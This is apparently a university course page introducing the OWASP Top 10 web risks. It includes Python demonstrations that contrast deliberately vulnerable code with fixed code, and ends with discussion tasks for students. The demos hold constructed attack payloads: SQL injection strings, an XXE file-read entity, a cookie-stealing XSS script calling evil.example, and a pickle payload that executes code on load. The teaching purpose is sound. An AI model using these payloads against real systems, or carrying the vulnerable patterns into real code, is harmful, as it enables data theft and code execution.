
The OWASP top 10

Understanding the common threats to our systems and applications helps us to identify the elements that are most likely to have flaws, and so where to spend our review and testing effort.

Important

These lists are meant for guidance. They tell us the common areas where flaws are found and give us some idea of the relative risks, but focusing only on the items in the list means that other security issues will be missed.

One such list is the OWASP Top 10 web application security risks.

The OWASP Foundation has been publishing a list of what it classes as the most critical web application security risks since 2003. The list is compiled by a team of industry contributors, based on vulnerability data gathered from real applications and on the experience of practitioners.

The 2017 edition (the most recent at the time this page was written) drew on data from over 50,000 applications and 2.3 million vulnerabilities. The weaknesses found are then categorised and ranked according to the risk they pose.

Each category is rated on:

  • Ease of exploitation (how easy it is for an attacker to abuse the weakness)
  • Prevalence (how common the weakness is across applications)
  • Detectability (how easily an attacker can find it)
  • Technical impact (what the attacker can do once it is exploited)

Note

The numbering scheme may make it seem like a list of the most common attacks. However, what is ranked is the risk associated with each type of weakness, which combines how likely it is to be found and exploited with how much damage that does.

It is interesting to note that the threat agent (who is likely to attack a given application, and how motivated they are) and the business impact of a breach are not factored into the rating. Both are specific to each application, so the list leaves them for each organisation to assess for itself.

Looking at the OWASP top 10

In this section we will take a brief look at the top 10. We will cover some of these in detail over the next couple of weeks.

You can find a more detailed treatment of each item in the OWASP Top 10 document.

  1. Injection:

    Including SQL, NoSQL, OS command and LDAP injection. This happens when untrusted data is sent to an interpreter as part of a command or query, so that the data is parsed as part of the command rather than treated as a value.

    This may allow the attacker to execute commands on the server, or to read or modify data they should not have access to.

  2. Broken Authentication:

    Functions related to authentication and session handling are not implemented correctly: weak or default passwords are accepted, credential stuffing and brute force are not rate limited, or session tokens are predictable or are not invalidated on logout.

    This can allow an attacker to compromise passwords or session tokens and assume other users' identities.

  3. Sensitive Data Exposure

    Where the web application does not adequately protect sensitive information such as passwords, payment details or personal data. Typical causes are storing data in cleartext, transmitting it without TLS, or using weak or misconfigured cryptography. (Exposing another user's record through a modified request is a failure of access control, item 5 below, rather than of data protection.)

  4. XML External Entities

    Older or badly configured XML parsers resolve external entity references declared in a document's DTD. An attacker who can submit or upload XML can use this to read files from the server, make the server issue requests to internal systems, or exhaust the parser's resources (denial of service).

  5. Broken Access Control

    Where restrictions on what authenticated users are allowed to do are not properly enforced. An attacker can then access other users' records, files or functions simply by changing an identifier in a request, or act with privileges their account should not have.

  6. Security Misconfiguration

    Where insecure site, framework or library configurations are used. This may be the result of insecure default configurations, leaving unnecessary features or debug options turned on, verbose error messages that reveal internals, or mistakes in the config settings.

  7. Cross Site Scripting.

    XSS attacks occur when untrusted user-supplied data is included in a web page without proper validation or escaping. This allows an attacker to execute scripts in the victim's browser, which can then hijack the victim's session, deface the site or redirect the user elsewhere.

  8. Insecure Deserialization.

    Where the application rebuilds objects from user-supplied serialised data (session cookies, API payloads, cached objects) without restricting what that data is allowed to instantiate. This commonly leads to remote code execution on the server, but can also enable injection or XSS-style attacks.

  9. Using Components with Known Vulnerabilities.

    Libraries, frameworks and other components run with the same privileges as the application, so a known vulnerability in one of them can lead to any of the attacks above. This becomes more important when we realise that new vulnerabilities are discovered in components long after we chose to use them, so dependencies need tracking and updating, not just vetting once.

  10. Insufficient Logging and Monitoring.

    While this may not directly lead to the application being compromised, audit trails are vital to detecting, understanding and responding to attacks; without them an intrusion can go unnoticed for months.
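The injection item above is easiest to understand by watching the same query built two ways. The following is an added example, not code from this page or from OWASP: it uses Python's standard-library sqlite3 module, a constructed in-memory table, and two constructed attacker inputs. One input makes the WHERE clause true for every row; the other uses UNION to pull the schema out of sqlite_master instead of a user record. The parameterised version returns nothing for either, because the SQL structure is fixed before the data arrives.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with a few sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.org"), ("bob", "bob@example.org"),
         ("carol", "carol@example.org")],
    )
    return conn

def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # VULNERABLE: the untrusted value is spliced into the SQL text, so the
    # database parses it as part of the query rather than as a value.
    query = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    # SAFE: a bound parameter is always treated as a value, whatever
    # characters it contains. The query structure cannot be changed by data.
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()

# Constructed attacker inputs.
BYPASS = "x' OR '1'='1"                                    # WHERE clause becomes true for every row
EXFIL = "x' UNION SELECT name, sql FROM sqlite_master --"  # reads the schema instead of a user

def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_bypass": find_user_vulnerable(conn, BYPASS),
        "vulnerable_exfil": find_user_vulnerable(conn, EXFIL),
        "safe_bypass": find_user_safe(conn, BYPASS),
        "safe_exfil": find_user_safe(conn, EXFIL),
        "safe_normal": find_user_safe(conn, "alice"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The trailing `--` in the second payload comments out the closing quote the application appends, which is why the attacker never has to balance it. The same principle (keep code and data separate, using the interpreter's own binding mechanism) applies to LDAP filters, shell commands and NoSQL query objects.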
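For the XML External Entities item, the practical defence is to refuse DTDs altogether rather than to try to sanitise entity declarations. The following is an added example, not from this page or from OWASP; it uses only the standard-library xml.etree parser with constructed documents (the hardened defusedxml package is the usual choice in real code, but it is not used here so the block runs on a bare interpreter). It first shows that the stock parser does honour entity declarations in a DOCTYPE (an internal entity expands three times, the mechanism behind "billion laughs"), then a wrapper that rejects any document carrying a DOCTYPE, which removes both external-entity and entity-expansion attacks in one check.

```python
import re
import xml.etree.ElementTree as ET

# Constructed documents for the demonstration.
BENIGN = "<order><item>widget</item></order>"

# Shape of a classic XXE payload: an external entity pointing at a local file.
# Whether the file contents come back depends on the parser in use.
XXE_SHAPED = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
    "<order><item>&xxe;</item></order>"
)

# An internal entity: the standard-library parser expands this without
# complaint. Nest such entities a few levels deep and you have a memory bomb.
INTERNAL_ENTITY = (
    '<!DOCTYPE order [<!ENTITY e "aaaa">]>'
    "<order><item>&e;&e;&e;</item></order>"
)

_DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)

def stdlib_expands_entities() -> str:
    """Show that a DTD in the document is acted on by the stock parser."""
    return ET.fromstring(INTERNAL_ENTITY).find("item").text

def parse_untrusted(data: bytes) -> ET.Element:
    """Refuse any document that carries a DTD, then parse it.

    Without a DOCTYPE there can be no entity declarations at all, so neither
    external entities nor expansion bombs can be expressed. The check is on the
    raw bytes, before anything is handed to the parser.
    """
    if _DOCTYPE.search(data):
        raise ValueError("DTD / DOCTYPE not allowed in untrusted XML")
    return ET.fromstring(data)

if __name__ == "__main__":
    print("stock parser expanded entity to:", stdlib_expands_entities())
    print("benign document parses:", parse_untrusted(BENIGN.encode()).tag)
    for doc in (XXE_SHAPED, INTERNAL_ENTITY):
        try:
            parse_untrusted(doc.encode())
        except ValueError as exc:
            print("rejected:", exc)
```

The check fails closed: a comment or CDATA section that happens to contain the string `<!DOCTYPE` is also rejected, which is the right trade-off for input from outside. If a legitimate feed genuinely needs a DTD, parse it with a library that lets you disable external entity resolution and cap expansion explicitly rather than relaxing this check.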
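The broken access control item is usually an insecure direct object reference: the handler checks that the caller is logged in but never that the record is theirs. The following is an added example, not from this page or from OWASP, using constructed invoice records and hypothetical handler names. The vulnerable handler returns whatever id it is given; the safe one denies by default, decides from the server-side identity and roles, and uses one error for "missing" and "not yours" so that responses do not confirm which ids exist.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Invoice:
    id: int
    owner: str
    total: str

# Constructed sample records.
INVOICES = {
    1001: Invoice(1001, "alice", "12.00"),
    1002: Invoice(1002, "bob", "99.50"),
}

class Forbidden(Exception):
    pass

def get_invoice_vulnerable(current_user: str, invoice_id: int) -> Invoice:
    # VULNERABLE: the caller is authenticated, but nothing checks that the
    # record belongs to them. Any logged-in user can walk the id space
    # (/invoices/1001, /invoices/1002, ...) and read everyone's invoices.
    return INVOICES[invoice_id]

def get_invoice_safe(current_user: str, invoice_id: int, roles: tuple = ()) -> Invoice:
    # SAFE: deny by default, and decide from the authenticated identity and
    # its server-side roles, never from anything the client says about itself.
    inv = INVOICES.get(invoice_id)
    if inv is None or (inv.owner != current_user and "admin" not in roles):
        # One error for both "no such record" and "not yours", so the
        # response does not reveal which ids exist.
        raise Forbidden(f"invoice {invoice_id} is not accessible to {current_user}")
    return inv

if __name__ == "__main__":
    print("alice via vulnerable handler gets:", get_invoice_vulnerable("alice", 1002))
    try:
        get_invoice_safe("alice", 1002)
    except Forbidden as exc:
        print("safe handler:", exc)
    print("bob gets his own:", get_invoice_safe("bob", 1002))
```

In a real application the ownership check belongs in one place (a data-access layer or a decorator applied to every handler) rather than being re-written per endpoint, because the endpoint that forgets it is the one that ends up in the breach report.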
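For the cross-site scripting item, the point to carry away is that the fix is output encoding for the context the data lands in, and that encoding alone is not enough for every context. The following is an added example, not from this page or from OWASP, with a constructed cookie-stealing payload and hypothetical rendering helpers. The element-body case is solved by `html.escape`; the `href` attribute case additionally needs a scheme allow-list, because `javascript:alert(1)` contains no HTML metacharacters and survives escaping untouched.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input.
PAYLOAD = "<script>document.location='https://evil.example/?c='+document.cookie</script>"

def render_comment_vulnerable(comment: str) -> str:
    # VULNERABLE: the untrusted string is concatenated straight into the markup,
    # so any tags it contains become part of the page and run in every viewer's browser.
    return f'<p class="comment">{comment}</p>'

def render_comment_safe(comment: str) -> str:
    # SAFE for element-body context: encode the HTML metacharacters so the
    # browser displays the text literally instead of parsing it as tags.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'

def render_link_safe(url: str, text: str) -> str:
    # Attribute context: escaping is necessary but not sufficient. A javascript:
    # URL survives html.escape unchanged and still executes when clicked, so
    # allow-list the scheme before the value is placed in href. Relative URLs
    # (empty scheme) are also refused here; widen the set deliberately if needed.
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("http", "https"):
        raise ValueError(f"refusing to link to scheme {scheme!r}")
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text, quote=True)}</a>'

if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(render_link_safe("https://example.org/a?b=1&c=2", "example"))
    try:
        render_link_safe("javascript:alert(1)", "click me")
    except ValueError as exc:
        print(exc)
```

Template engines that auto-escape (Jinja2 with autoescape on, Django templates) do the element-body step for you; the attribute and URL cases, and anywhere `|safe` or `mark_safe` is used, still need the explicit thought shown here.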
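The insecure deserialization item is best seen by building a payload and loading it. The following is an added example, not from this page or from OWASP, using Python's pickle as the native serialisation format and a constructed payload whose effect is a harmless, observable function call standing in for `os.system`. The receiving code never mentions the `Exploit` class; the callable's module and name travel inside the bytes, and `pickle.loads` invokes it. The safe path uses a data-only format (JSON) and then checks the decoded shape explicitly.

```python
import json
import pickle

# Record of what the deserialised payload managed to run (for the demonstration).
EXECUTED: list = []

def attacker_callable(marker: str) -> str:
    """Stand-in for os.system, subprocess.run or any other importable function."""
    EXECUTED.append(marker)
    return marker

class Exploit:
    # pickle asks __reduce__ how to rebuild an object; the answer is "call this
    # callable with these arguments", and pickle.loads obliges on the receiving
    # side. The receiver needs no knowledge of this class for that to happen.
    def __reduce__(self):
        return (attacker_callable, ("pwned",))

def build_payload() -> bytes:
    # Constructed attacker payload.
    return pickle.dumps(Exploit())

def load_vulnerable(blob: bytes):
    # VULNERABLE: whatever callable the data names is invoked during loading.
    return pickle.loads(blob)

def load_safe(blob: bytes) -> dict:
    # SAFE: a data-only format, then an explicit check of the shape we expect.
    # json.loads can only ever yield dicts, lists, str, numbers, bools and None,
    # so there is no path from bytes to "call this function".
    obj = json.loads(blob)
    ok = (
        isinstance(obj, dict)
        and set(obj) == {"user", "qty"}
        and isinstance(obj["user"], str)
        and isinstance(obj["qty"], int) and not isinstance(obj["qty"], bool)
        and obj["qty"] >= 0
    )
    if not ok:
        raise ValueError("unexpected message shape")
    return obj

if __name__ == "__main__":
    print("pickle.loads returned:", load_vulnerable(build_payload()), "side effects:", EXECUTED)
    print("json path returned:", load_safe(b'{"user": "alice", "qty": 2}'))
    try:
        load_safe(build_payload())
    except ValueError as exc:
        print("pickle bytes rejected by json path:", type(exc).__name__)
```

The same pattern (an object graph that names the code used to rebuild it) is what makes Java's `ObjectInputStream`, PHP's `unserialize` and .NET's `BinaryFormatter` dangerous on untrusted input. If a native format cannot be avoided, sign the serialised bytes and verify the signature before deserialising, and restrict the classes the loader may instantiate.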

Script Kiddies #ScriptKiddies

Several of the vulnerabilities have been on the list since the first release of the OWASP Top 10. Some (such as SQLi) are well-known issues that can be exploited with tools freely downloaded from the web, with no real understanding of how the attack works.

  • Are there any of the Top 10 that surprise you?
  • Why do you think that well known vulnerabilities are still in the top 10?

Post in the Feed on Aula using the tag #ScriptKiddies

OWASP top 10 #OWASP

Pick one of the OWASP top 10, and research it in more detail.

Put together a short (2 paragraph) report on the issue showing:

  • How this issue occurs
  • A real-world example of this issue

Post in the Feed on Aula using the tag #OWASP
